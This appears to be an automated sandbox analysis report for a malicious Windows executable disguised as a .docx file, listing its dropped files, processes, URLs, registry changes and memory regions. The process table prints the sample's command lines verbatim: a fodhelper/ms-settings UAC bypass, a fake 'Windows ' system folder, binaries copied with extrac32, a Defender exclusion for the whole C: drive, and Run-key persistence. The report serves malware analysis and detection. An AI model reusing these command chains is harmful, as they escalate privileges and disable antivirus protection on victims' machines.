Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\gaban\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Pyemdbrd
|
data
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Pyemdbrd.PIF
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Libraries\drbdmeyP.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Pyemdbrd.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat
|
ASCII text, with very long lines (324), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\Libraries\PNO
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\alpha.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\ger.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\xkn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieogscvd.21l.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txw30cbq.i2f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows \System32\per.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
modified
|
||
|
\Device\Null
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
|
"C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
|
|
|
|
C:\Users\Public\Libraries\drbdmeyP.pif
|
C:\Users\Public\Libraries\drbdmeyP.pif
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger
add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden
-Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
|
|
|
C:\Users\Public\xkn.exe
|
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
|
|
|
C:\Users\Public\alpha.exe
|
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ
/d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
|
|
|
C:\Users\Public\ger.exe
|
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn
-WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
|
|
|
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
|
|
|
|
C:\Windows\SysWOW64\colorcpl.exe
|
C:\Windows\System32\colorcpl.exe
|
|
|
|
C:\Windows \System32\per.exe
|
"C:\\Windows \\System32\\per.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettings.exe
|
||
|
C:\Windows\System32\SystemSettingsAdminFlows.exe
|
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
|
There are 14 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://wcmanagers.com/
|
unknown
|
|
|
|
https://wcmanagers.com/Er9/233_Pyemdbrdpps
|
108.170.55.202
|
|
|
|
www.vipguyclassproject2024.space
|
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz
|
unknown
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://wcmanagers.com/Er9/233_Pyemdbrdpps03
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.pmail.com
|
unknown
|
||
|
http://ocsp.sectigo.com0C
|
unknown
|
||
|
https://login.windows.localP
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
wcmanagers.com
|
108.170.55.202
|
|
|
|
198.187.3.20.in-addr.arpa
|
unknown
|
|
|
|
www.vipguyclassproject2024.space
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
108.170.55.202
|
wcmanagers.com
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Pyemdbrd
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3
|
time
|
|
|
|
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%systemroot%\system32\colorui.dll,-1400
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\ProfileAssociations\Print\Fax
|
UsePerUserProfiles
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2980000
|
direct allocation
|
page execute and read and write
|
|
|
|
4580000
|
direct allocation
|
page execute and read and write
|
|
|
|
281F000
|
heap
|
page read and write
|
|
|
|
6420000
|
remote allocation
|
page execute and read and write
|
|
|
|
9E9AAFF000
|
stack
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
7EDA0000
|
direct allocation
|
page read and write
|
||
|
7F670000
|
direct allocation
|
page read and write
|
||
|
2F389055000
|
heap
|
page read and write
|
||
|
2716A8B0000
|
heap
|
page read and write
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
1EC82112000
|
trusted library allocation
|
page read and write
|
||
|
7EF10000
|
direct allocation
|
page read and write
|
||
|
1ECFF960000
|
heap
|
page read and write
|
||
|
2814000
|
heap
|
page read and write
|
||
|
25C6BF20000
|
heap
|
page read and write
|
||
|
1EC81480000
|
heap
|
page readonly
|
||
|
2AE6000
|
heap
|
page read and write
|
||
|
1FCCA14C000
|
heap
|
page read and write
|
||
|
23AD000
|
direct allocation
|
page read and write
|
||
|
6F319FF000
|
stack
|
page read and write
|
||
|
480F000
|
stack
|
page read and write
|
||
|
466000
|
unkown
|
page write copy
|
||
|
16703AD5000
|
heap
|
page read and write
|
||
|
2725E000
|
stack
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
6F4187C000
|
stack
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
1EC91CB5000
|
trusted library allocation
|
page read and write
|
||
|
2693F000
|
stack
|
page read and write
|
||
|
16721FA4000
|
heap
|
page read and write
|
||
|
26ABE000
|
stack
|
page read and write
|
||
|
237E000
|
direct allocation
|
page read and write
|
||
|
1FCCA164000
|
heap
|
page read and write
|
||
|
2716AA70000
|
heap
|
page read and write
|
||
|
6D6000
|
heap
|
page read and write
|
||
|
6F315EB000
|
stack
|
page read and write
|
||
|
468F000
|
stack
|
page read and write
|
||
|
1EC81CA1000
|
trusted library allocation
|
page read and write
|
||
|
18E018F0000
|
heap
|
page read and write
|
||
|
27A80000
|
direct allocation
|
page execute and read and write
|
||
|
32A3C000
|
stack
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
19A26AF8000
|
heap
|
page read and write
|
||
|
1FF4D0E000
|
stack
|
page read and write
|
||
|
5E765FF000
|
stack
|
page read and write
|
||
|
2716A97D000
|
heap
|
page read and write
|
||
|
22009180000
|
heap
|
page read and write
|
||
|
7F732000
|
direct allocation
|
page read and write
|
||
|
9E9A876000
|
stack
|
page read and write
|
||
|
2841000
|
heap
|
page read and write
|
||
|
24837A30000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
17825C4B000
|
heap
|
page read and write
|
||
|
16721F8B000
|
heap
|
page read and write
|
||
|
18E01730000
|
heap
|
page read and write
|
||
|
16722145000
|
heap
|
page read and write
|
||
|
DAB5FDB000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
2841000
|
heap
|
page read and write
|
||
|
7FF6C8979000
|
unkown
|
page readonly
|
||
|
2741B000
|
heap
|
page read and write
|
||
|
31D4E000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7FF64B5B4000
|
unkown
|
page read and write
|
||
|
248377D0000
|
heap
|
page read and write
|
||
|
5E7657D000
|
stack
|
page read and write
|
||
|
1FCCA164000
|
heap
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
492000
|
remote allocation
|
page execute and read and write
|
||
|
18E01653000
|
heap
|
page read and write
|
||
|
23B4000
|
direct allocation
|
page read and write
|
||
|
7ED10000
|
direct allocation
|
page read and write
|
||
|
7FF6EF4BF000
|
unkown
|
page readonly
|
||
|
4D1000
|
unkown
|
page write copy
|
||
|
1ECFFA80000
|
heap
|
page read and write
|
||
|
EDA2CFF000
|
stack
|
page read and write
|
||
|
31DEE000
|
stack
|
page read and write
|
||
|
4440000
|
heap
|
page read and write
|
||
|
7EBF0000
|
direct allocation
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
4312AFF000
|
stack
|
page read and write
|
||
|
1EC81B77000
|
heap
|
page read and write
|
||
|
43B000
|
unkown
|
page execute and read and write
|
||
|
7FD7C000
|
direct allocation
|
page read and write
|
||
|
2533000
|
heap
|
page read and write
|
||
|
1E733C5C000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
1E260000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1FF4C8B000
|
stack
|
page read and write
|
||
|
7FFAAC941000
|
trusted library allocation
|
page read and write
|
||
|
1FCCA134000
|
heap
|
page read and write
|
||
|
21257C70000
|
heap
|
page read and write
|
||
|
844FFC000
|
stack
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
1E735C60000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
7FFAACA50000
|
trusted library allocation
|
page read and write
|
||
|
1E733C4A000
|
heap
|
page read and write
|
||
|
7EE89000
|
direct allocation
|
page read and write
|
||
|
21257C74000
|
heap
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
31C50000
|
heap
|
page read and write
|
||
|
16721FA7000
|
heap
|
page read and write
|
||
|
26652000
|
direct allocation
|
page read and write
|
||
|
9E9A9FC000
|
stack
|
page read and write
|
||
|
19A26B3B000
|
heap
|
page read and write
|
||
|
26F80000
|
heap
|
page read and write
|
||
|
16722140000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
DB000
|
stack
|
page read and write
|
||
|
31D9E000
|
stack
|
page read and write
|
||
|
7FF64B5A5000
|
unkown
|
page read and write
|
||
|
8452FF000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
19A26B06000
|
heap
|
page read and write
|
||
|
842000
|
heap
|
page read and write
|
||
|
7EB70000
|
direct allocation
|
page read and write
|
||
|
212578C0000
|
heap
|
page read and write
|
||
|
3A4CAFE000
|
stack
|
page read and write
|
||
|
7FF6EF4B0000
|
unkown
|
page readonly
|
||
|
82E000
|
heap
|
page read and write
|
||
|
2F38A810000
|
heap
|
page read and write
|
||
|
19E81414000
|
heap
|
page read and write
|
||
|
827000
|
heap
|
page read and write
|
||
|
7F300000
|
direct allocation
|
page read and write
|
||
|
7FFAACA80000
|
trusted library allocation
|
page read and write
|
||
|
19E81170000
|
heap
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
1EC81C63000
|
trusted library allocation
|
page read and write
|
||
|
19A28680000
|
heap
|
page read and write
|
||
|
1EC820E9000
|
trusted library allocation
|
page read and write
|
||
|
2D41C914000
|
heap
|
page read and write
|
||
|
6F41BBA000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7FC80000
|
direct allocation
|
page read and write
|
||
|
7FF6EF4BB000
|
unkown
|
page readonly
|
||
|
19A26BF0000
|
heap
|
page read and write
|
||
|
31DA0000
|
heap
|
page read and write
|
||
|
1EC91C41000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
4A1000
|
unkown
|
page execute and read and write
|
||
|
30240000
|
heap
|
page read and write
|
||
|
7ECEF000
|
direct allocation
|
page read and write
|
||
|
301B0000
|
heap
|
page read and write
|
||
|
16703AA0000
|
heap
|
page read and write
|
||
|
2827000
|
heap
|
page read and write
|
||
|
17825E13000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
1EC81BBA000
|
heap
|
page read and write
|
||
|
16703AE0000
|
heap
|
page read and write
|
||
|
248377C0000
|
heap
|
page read and write
|
||
|
2AEA000
|
heap
|
page read and write
|
||
|
307BF000
|
stack
|
page read and write
|
||
|
7FFAAC846000
|
trusted library allocation
|
page read and write
|
||
|
300FF000
|
stack
|
page read and write
|
||
|
16722144000
|
heap
|
page read and write
|
||
|
6F419FE000
|
stack
|
page read and write
|
||
|
21FE000
|
stack
|
page read and write
|
||
|
7EDA0000
|
direct allocation
|
page read and write
|
||
|
1FCCA0B0000
|
heap
|
page read and write
|
||
|
1FCCA149000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
17825C1A000
|
heap
|
page read and write
|
||
|
19A26D70000
|
heap
|
page read and write
|
||
|
7FFAACAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA00000
|
trusted library allocation
|
page read and write
|
||
|
21257A90000
|
heap
|
page read and write
|
||
|
16703D40000
|
heap
|
page read and write
|
||
|
2848000
|
heap
|
page read and write
|
||
|
250C000
|
stack
|
page read and write
|
||
|
3013E000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
19E81310000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
7FF6C8910000
|
unkown
|
page readonly
|
||
|
4AF000
|
remote allocation
|
page execute and read and write
|
||
|
7FFAAC84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
16721FA7000
|
heap
|
page read and write
|
||
|
17825C4B000
|
heap
|
page read and write
|
||
|
24837A20000
|
heap
|
page read and write
|
||
|
7EDC0000
|
direct allocation
|
page read and write
|
||
|
265F6000
|
direct allocation
|
page read and write
|
||
|
1D801C66000
|
heap
|
page read and write
|
||
|
2483781A000
|
heap
|
page read and write
|
||
|
7FDEC000
|
direct allocation
|
page read and write
|
||
|
7EEC0000
|
direct allocation
|
page read and write
|
||
|
18E01657000
|
heap
|
page read and write
|
||
|
7FF7E0A13000
|
unkown
|
page read and write
|
||
|
301C0000
|
heap
|
page read and write
|
||
|
1E733E40000
|
heap
|
page read and write
|
||
|
1E733C56000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
462000
|
unkown
|
page read and write
|
||
|
301FE000
|
heap
|
page read and write
|
||
|
7EEC0000
|
direct allocation
|
page read and write
|
||
|
4CC000
|
unkown
|
page execute and read and write
|
||
|
7FF6C8927000
|
unkown
|
page readonly
|
||
|
7EF5A000
|
direct allocation
|
page read and write
|
||
|
285E000
|
heap
|
page read and write
|
||
|
7FF6C8926000
|
unkown
|
page read and write
|
||
|
7FF7E0A01000
|
unkown
|
page execute read
|
||
|
5E7687F000
|
stack
|
page read and write
|
||
|
23CA000
|
direct allocation
|
page read and write
|
||
|
266EA000
|
direct allocation
|
page read and write
|
||
|
21257C75000
|
heap
|
page read and write
|
||
|
18E01830000
|
heap
|
page read and write
|
||
|
7FF64B5A5000
|
unkown
|
page read and write
|
||
|
7FFAAC840000
|
trusted library allocation
|
page read and write
|
||
|
1EC81AFE000
|
heap
|
page read and write
|
||
|
1E733C5B000
|
heap
|
page read and write
|
||
|
2F38A800000
|
heap
|
page read and write
|
||
|
DAB63FE000
|
stack
|
page read and write
|
||
|
1FCCA126000
|
heap
|
page read and write
|
||
|
282A000
|
heap
|
page read and write
|
||
|
17825C43000
|
heap
|
page read and write
|
||
|
328FF000
|
stack
|
page read and write
|
||
|
16703B96000
|
heap
|
page read and write
|
||
|
7FF7E0A54000
|
unkown
|
page readonly
|
||
|
1D801C08000
|
heap
|
page read and write
|
||
|
87A000
|
heap
|
page read and write
|
||
|
212578E3000
|
heap
|
page read and write
|
||
|
19A26B53000
|
heap
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
1EC815C0000
|
heap
|
page read and write
|
||
|
7F350000
|
direct allocation
|
page read and write
|
||
|
2716ABA5000
|
heap
|
page read and write
|
||
|
2F388DF0000
|
heap
|
page read and write
|
||
|
327BF000
|
stack
|
page read and write
|
||
|
266BF000
|
direct allocation
|
page read and write
|
||
|
7FF7E0A54000
|
unkown
|
page readonly
|
||
|
2716A7B0000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
6C55FF000
|
stack
|
page read and write
|
||
|
27650000
|
heap
|
page read and write
|
||
|
7FFB1B712000
|
unkown
|
page readonly
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
6F41673000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7F560000
|
direct allocation
|
page read and write
|
||
|
17825C47000
|
heap
|
page read and write
|
||
|
565AFFF000
|
stack
|
page read and write
|
||
|
1FCCA100000
|
heap
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
17825C1A000
|
heap
|
page read and write
|
||
|
1FCCA14C000
|
heap
|
page read and write
|
||
|
47CD000
|
stack
|
page read and write
|
||
|
7EB20000
|
direct allocation
|
page read and write
|
||
|
1FCCA11A000
|
heap
|
page read and write
|
||
|
7FFAAC876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCCA11A000
|
heap
|
page read and write
|
||
|
7EDEF000
|
direct allocation
|
page read and write
|
||
|
1FCCA134000
|
heap
|
page read and write
|
||
|
1FF4D8E000
|
stack
|
page read and write
|
||
|
2765D000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
17825B50000
|
heap
|
page read and write
|
||
|
1ECFFA33000
|
heap
|
page read and write
|
||
|
1EC81D59000
|
trusted library allocation
|
page read and write
|
||
|
266C6000
|
direct allocation
|
page read and write
|
||
|
248377F0000
|
heap
|
page read and write
|
||
|
464E000
|
stack
|
page read and write
|
||
|
17825EC4000
|
heap
|
page read and write
|
||
|
18E0163A000
|
heap
|
page read and write
|
||
|
1FCCA030000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
8CA000
|
heap
|
page read and write
|
||
|
6F318FF000
|
stack
|
page read and write
|
||
|
1E733E20000
|
heap
|
page read and write
|
||
|
2FFDE000
|
stack
|
page read and write
|
||
|
1ECFFA41000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
220091E9000
|
heap
|
page read and write
|
||
|
2530000
|
heap
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
19A26B16000
|
heap
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
24837834000
|
heap
|
page read and write
|
||
|
7FFB1B6F1000
|
unkown
|
page execute read
|
||
|
7FF6C891D000
|
unkown
|
page readonly
|
||
|
7FF6EF4BE000
|
unkown
|
page write copy
|
||
|
2F388E30000
|
heap
|
page read and write
|
||
|
CB997CC000
|
stack
|
page read and write
|
||
|
ECA3AFF000
|
stack
|
page read and write
|
||
|
1EC91C50000
|
trusted library allocation
|
page read and write
|
||
|
457B000
|
stack
|
page read and write
|
||
|
1E733C4A000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
7EC80000
|
direct allocation
|
page read and write
|
||
|
19A26B1B000
|
heap
|
page read and write
|
||
|
84E000
|
heap
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
7E990000
|
direct allocation
|
page read and write
|
||
|
7FF6EF4B1000
|
unkown
|
page execute read
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
843000
|
heap
|
page read and write
|
||
|
7FF7E0A10000
|
unkown
|
page readonly
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
3257F000
|
stack
|
page read and write
|
||
|
19A26CF0000
|
heap
|
page read and write
|
||
|
4DA000
|
unkown
|
page execute and read and write
|
||
|
8C7000
|
heap
|
page read and write
|
||
|
40D000
|
unkown
|
page write copy
|
||
|
4D3000
|
remote allocation
|
page execute and read and write
|
||
|
25C6BF24000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
17825C26000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
26E3D000
|
stack
|
page read and write
|
||
|
831000
|
heap
|
page read and write
|
||
|
45F4000
|
direct allocation
|
page execute and read and write
|
||
|
16721F80000
|
heap
|
page read and write
|
||
|
31D50000
|
heap
|
page read and write
|
||
|
7FF64B5B4000
|
unkown
|
page read and write
|
||
|
2716A970000
|
heap
|
page read and write
|
||
|
7FF6EF4BB000
|
unkown
|
page readonly
|
||
|
1E733C4A000
|
heap
|
page read and write
|
||
|
26BFE000
|
stack
|
page read and write
|
||
|
21257810000
|
heap
|
page read and write
|
||
|
2D41C920000
|
heap
|
page read and write
|
||
|
499000
|
remote allocation
|
page execute and read and write
|
||
|
1CF000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
7FF6C8926000
|
unkown
|
page write copy
|
||
|
1EC81C30000
|
heap
|
page execute and read and write
|
||
|
2775F000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
|
1EC815C4000
|
heap
|
page read and write
|
||
|
21257830000
|
heap
|
page read and write
|
||
|
7FFAAC9F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
1FCCA116000
|
heap
|
page read and write
|
||
|
67E000
|
stack
|
page read and write
|
||
|
31DF7000
|
heap
|
page read and write
|
||
|
7FF64B5B4000
|
unkown
|
page read and write
|
||
|
7FFAAC972000
|
trusted library allocation
|
page read and write
|
||
|
19E81070000
|
heap
|
page read and write
|
||
|
7FFB1B706000
|
unkown
|
page readonly
|
||
|
2711F000
|
stack
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
9E9A97E000
|
stack
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
7DF43F660000
|
trusted library allocation
|
page execute and read and write
|
||
|
17825C47000
|
heap
|
page read and write
|
||
|
9EF000
|
stack
|
page read and write
|
||
|
1E733C46000
|
heap
|
page read and write
|
||
|
17825C47000
|
heap
|
page read and write
|
||
|
1FCCA354000
|
heap
|
page read and write
|
||
|
7FF6C891A000
|
unkown
|
page readonly
|
||
|
400000
|
unkown
|
page readonly
|
||
|
25C6BDD0000
|
heap
|
page read and write
|
||
|
7FF6C8911000
|
unkown
|
page execute read
|
||
|
7FF7E0A00000
|
unkown
|
page readonly
|
||
|
2D41C910000
|
heap
|
page read and write
|
||
|
27860000
|
direct allocation
|
page execute and read and write
|
||
|
1D801F64000
|
heap
|
page read and write
|
||
|
D5822BB000
|
stack
|
page read and write
|
||
|
7FFAAC9B0000
|
trusted library allocation
|
page read and write
|
||
|
2716A890000
|
heap
|
page read and write
|
||
|
17825EC0000
|
heap
|
page read and write
|
||
|
7FFAAC980000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F416FE000
|
stack
|
page read and write
|
||
|
7FD58000
|
direct allocation
|
page read and write
|
||
|
7FCDF000
|
direct allocation
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
4580000
|
heap
|
page read and write
|
||
|
17825C16000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
7FFAAC792000
|
trusted library allocation
|
page read and write
|
||
|
6D7000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
7FF7E0A01000
|
unkown
|
page execute read
|
||
|
297F000
|
stack
|
page read and write
|
||
|
43B000
|
remote allocation
|
page execute and read and write
|
||
|
19E81410000
|
heap
|
page read and write
|
||
|
ECA3BFF000
|
stack
|
page read and write
|
||
|
19A26DC4000
|
heap
|
page read and write
|
||
|
6C51CC000
|
stack
|
page read and write
|
||
|
26D3E000
|
stack
|
page read and write
|
||
|
6F41A77000
|
stack
|
page read and write
|
||
|
4CC000
|
unkown
|
page write copy
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
1FCCA2A0000
|
heap
|
page read and write
|
